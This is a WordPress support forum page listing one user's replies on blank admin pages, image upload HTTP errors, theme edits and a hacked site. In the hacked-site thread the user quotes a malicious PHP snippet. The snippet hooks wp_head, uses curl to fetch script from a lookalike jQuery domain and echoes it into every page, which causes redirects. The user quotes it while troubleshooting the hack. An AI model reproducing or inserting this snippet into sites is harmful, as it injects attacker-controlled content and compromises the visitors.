Bojan Deni?
Forum Replies Created
-
Forum: Installing WordPress
In reply to: Blank page in WP Admint-p, I have new updates for this theme, and works with WordPress 3.5
You don’t understand my problem, please read my first post. :/
EDIT:
I fix my problem, I looked in my functions.php and found empty spaces at the top and bottom of my code. These spaces at the top or bottom of the functions.php file kill the admin dashboard.
Forum: Installing WordPress
In reply to: Blank page in WP AdminI use Resportsive from ThemeForest. But theme works with WordPress 3.5
I get blank page in ADMIN, not in Front theme..
Forum: Installing WordPress
In reply to: Blank page in WP AdminI don’t have any plugin on website, I install new(fresh) wordpress on my domain.
Forum: Fixing WordPress
In reply to: My website was hackedI search all my files on theme folder, and I don’t have this line:
if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="https://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
I use Geoplace v.3 theme.
Forum: Fixing WordPress
In reply to: My website was hackedThis resources not help ??
My website redirect to this website:
www.jqueryc.com
Forum: Themes and Templates
In reply to: How to Bold Just One Menu ItemThanx for help! Now works! ??
Forum: Themes and Templates
In reply to: How to Bold Just One Menu ItemI do don’t want the all my menu links to bold, I wont only one bold menu/words
Veleprodaja SWAROVSKI ELEMENATA /// original
Veleprodaja SWAROVSKI ELEMENATA /// like thisForum: Fixing WordPress
In reply to: Show Category Posts in PageThis is on line error:
add_action ('thesis_hook_before_post','catpages');
Forum: Themes and Templates
In reply to: Problem with themethis is my header.php : https://pastebin.com/mdfvsh7M
can you tell me what change?
Forum: Fixing WordPress
In reply to: http error image uploadI found the problem for this error! I just disabled Smushit plugin and I can now upload image files again!
Forum: Fixing WordPress
In reply to: HTTP Error during Picture Uploads in Version 3.3.1My VPS is configured with: FcgidMaxRequestLen 211310720 and memory_limit: 128MB, post_max_size: 16MB, upload_max_filesize: 8MB and max_execution_time: 30
and don’t works, I again get this error for image upload: ‘HTTP error’! ??
Forum: Fixing WordPress
In reply to: How to add ads on front page and category?I change main index template and category:
<?php if (have_posts()) : ?>
<?php while (have_posts()) : the_post(); ?>Replace with:
<?php if (have_posts()) : $i=0; ?>
<?php while (have_posts()) : the_post(); ?>
<?php if($i++==3) : ?>
YOUR CODE HERE
<?php endif; ?><?php if($i==6) : ?>
YOUR CODE HERE
<?php endif; ?>Forum: Fixing WordPress
In reply to: http error image uploadI get this answer from my hosting provider:
”The VPS Server is running Apache Module.
https://www.example.com is working fine on our end.
Please note that we do not provide third party scripts support or debugging and cannot help you further.”
Forum: Fixing WordPress
In reply to: http error image uploadall my images for upload is 100-150kb
Forum: Fixing WordPress
In reply to: http error image uploadAgain, I have this problem with image upload: HTTP Error
I upload five image, and when I wanted to upload the sixth image, I get error ‘HTTP Error’
I do not know how to solve this problem…
This is my .htaccess: https://pastebin.com/LbenS1Y5